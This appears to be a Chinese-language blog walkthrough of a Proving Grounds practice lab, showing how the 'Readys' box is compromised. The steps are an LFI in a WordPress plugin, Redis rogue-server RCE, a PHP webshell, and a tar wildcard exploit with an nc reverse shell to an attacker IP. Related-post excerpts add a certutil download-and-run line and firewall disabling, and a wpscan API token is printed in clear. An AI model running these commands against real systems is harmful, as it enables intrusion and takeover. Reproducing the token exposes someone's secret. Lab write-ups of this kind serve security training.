Proving Grounds Practice : Readys Walkthrough

-

 Proving Grounds Practice : Readys Walkthrough


Foothole (立足點 ) :

  • 6379 Port 發現 Redis,使用 PoC 顯示要求權限
  • 80 Port 發現 WordPress 且套件 site-editor 有 LFI 問題
  • 透過 LFI 讀取 redis.conf 裡面的密碼後利用 redis 漏洞進入拿到 shell

PE ( 提權 ) :

  • 現有使用者限制一堆且沒有啥權限,發現通配符提權但利用路徑沒有權限寫入
  • 列舉可寫入目錄後測試在 /opt/redis-files 寫入 php-reverse-shell.php 執行後成功切換使用者 alice
  • alice 直接利用通配符提權後成為 root

注意事項 :

  • Redis 設定檔 redis.conf
  • 有不同帳號就是有梗,試著想各種方式切換使用者
  • Redis 標準利用,通配符標準利用
  • Redis CLI 如何寫入檔案


第一步 Rustscan,└─$ rustscan -a 192.168.207.166 --scripts none --ulimit 5000 | tee rustscan

22、80 與 6379 Port (這是已知的 Redis 預設 Port)



snmp closed,└─$ sudo nmap -sU -p 161 192.168.207.166 | tee snmp       



nmap,└─$ sudo nmap -sCV -A -p 22,80,6379 192.168.207.166 | tee nmap

22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp   open  http    Apache httpd 2.4.38 ((Debian))

6379/tcp open  redis   Redis key-value store (果然是 Redis)



參考前兩篇直接 Redis 漏洞利用進去看看

參考 : https://your-it-note.blogspot.com/2024/03/proving-grounds-practice-wombo.html

參考 : https://your-it-note.blogspot.com/2024/03/proving-grounds-practice-blackgate.html

Redis 好用的入侵工具,參考 https://github.com/n0b0dyCN/redis-rogue-server

一樣先將 exp.so、redis-rogue-server.py 下載到同一個路徑然後直些利用

└─$ ./redis-rogue-server.py --rhost 192.168.207.166 --lhost 192.168.45.160

跟之前某個狀況一樣卡在 [ [info] Setting dbfilename... ]



之前是因為卡在 21000 Port 回不來,換成 6379 Port 就過了,這裡一樣換 Port 試試看

6379 Port 一樣卡在同一個地方



80、443、445 都一樣狀況



再跑一次 445 帶上參數 -v 看一下較詳細的內容

發現卡在這一行 [ [->] b'-NOAUTH Authentication required.\r\n ],要求驗證



之前還有用過 nc 直接登入 Redis 試試看看可否登入

一樣顯示認證要求 -NOAUTH Authentication required.



看了一下 Redis 文件,Redis 預設不用帳號密碼,但可以設定驗證模式

預設第一種是僅有密碼驗證,第二種是帳號+密碼驗證

參考 : 6379 - Pentesting Redis | HackTricks | HackTricks

有告知該資訊是需要有效的 cerdential



如果只有設定密碼,預設的帳號就是 "default"

密碼是直接寫在設定檔中,設定檔檔名是 "redis.conf"

使用的字眼是 requirepass "這裡直接寫密碼的明碼"



這句話 [ In cases like this one you will need to find valid credentials to interact with Redis so you could try to brute-force it. ]

意思是說你必須找到有效的驗證或是暴力破解它,先找找看有無有效的驗證真的不行再來爆破


whatweb,└─$ whatweb http://192.168.207.166 | tee whatweb

看到很讚的字眼 "WordPress"



80 /



80 /robots.txt



80 /wp-admin 嘗試弱帳號密碼登入........失敗



一樣先 gobuster 看看,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.207.166 -c -t 150 -x txt,pdf,git,php | tee gobuster

都是 WordPress 相關的路徑沒有特別的



標準作業 wpscan 帶 API Key 掃掃看,└─$ wpscan --url http://192.168.207.166/ -e vp --plugins-detection mixed --api-token SLeabE8apPWHJlKslTsfKJX5Omi3cXffrTFzAsg5CZQ



wpscan 結果優先看 plug-in 的套件

掃完的結果只有一個 site-editor,且直接告知有 LFI 可以利用

https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44



另一個快速掃 WordPress 套件的指令,curl -s -X GET 'http://192.168.207.166/' | grep plugins | awk '{print $2}' | awk '{print $6}' FS='/' | sort -u

也可以看到是套件名稱是 site-editor



直接看看 wpscan 的說明,沒有看到 PoC



換查看 Exploit-DB 44340,https://www.exploit-db.com/exploits/44340



直接提供了 PoC,

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd



直接利用測試看看,└─$ curl -i http://192.168.207.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

拿到 /etc/passwd 了,發現帳號 alice



另外上面得知若 Redis 有要求驗證會將密碼以明碼的方式寫在 redis.conf 中

一般安裝會在 

 - /opt/bitnami/redis/etc/redis. conf

 - /usr/local/etc/redis.conf

 - /etc/redis/redis.conf



結果檔案在 /etc/redis/redis.conf,└─$ curl -i http://192.168.207.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf | tee redis.conf



過濾 requirepass 發現密碼 Ready4Redis?



另外在察看 Redis 相關文件時有發現 kali 有內建 redis-cli 指令,不用再用 nc




這一次直接 redis-cli 帶密碼登入進去看看,└─$ redis-cli -h 192.168.207.166 -a 'Ready4Redis?'

輸入 INFO 直接列出相關資訊了,看來驗證沒有問題


回看 RCE 的利用也可以帶密碼



RCE 漏洞利用,└─$ ./redis-rogue-server.py --rhost 192.168.207.166 --lhost 192.168.45.160 --passwd 'Ready4Redis?' 

這一次過了,一樣選擇 r 拿 Reverse Shell



拿到 Reverse Shell 了



先試著切換我們搜尋到的使用者看看 sudo alice,沒有成功且 /home 都沒有權限




cat /etc/crontab,發現一個 root 權限執行的備份檔 /usr/local/bin/backup.sh

而且現有使用者還有權限執行



看一下 backup.sh 內容,標準的 tar 通配符梗,利用路徑在 /var/www/html



當前使用者對該路徑資料夾沒有寫入權限,所以無法直接利用要另想出路



查看可寫入路徑 redis@readys:/etc/redis$ find / -writable -type d 2>/dev/null



切換到 /opt/redis-files 路徑上傳寫入 php 後門檔案 simple-backdoor.php



然後回到 LFI 的利用看一下權限有沒有不一樣,curl -i http://192.168.207.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/simple-backdoor.php?cmd=whoami

檔案路徑沒問題但是執行後失敗



改成上傳 reverse shell 檔案 php-reverse-shell.php



網站直接 LFI 存取,http://192.168.207.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/php-reverse-shell.php

拿到新的 Reverse Shell 了,且一連線進來發現 id 是 alice



一樣查看 root 權限執行的 backip.sh 中的通配符利用路徑 /var/www/html 有無權限

發現該資料夾 Owner 就是現有使用者 alice 且可以寫入



通配符標準利用

echo "mkfifo /tmp/lhennp; nc 192.168.45.160 4444 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh" 

echo "" > --checkpoint=1



4444 Port Reverse Shell 進來了,whoami & id 看一下確認是 root




補充說明,其實也可以透過 redis-cli 寫入檔案然後執行 nc or python 拿 reverse shell 如下

$ config set dir /opt/redis-files 

$ config set dbfilename cmd.php 

$ set test'<?php system($_GET["cmd"]); ?>' 

$ save



cmd=whoami 看一下是 alice

這裡 cmd 會有作用但是前面 simple-backdoor.php 沒有作用是因為寫入 cmd 指令時不同

可以看上圖是用 <?php system($_GET["cmd"]); ?>



執行 python 拿 Reverse Shell




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容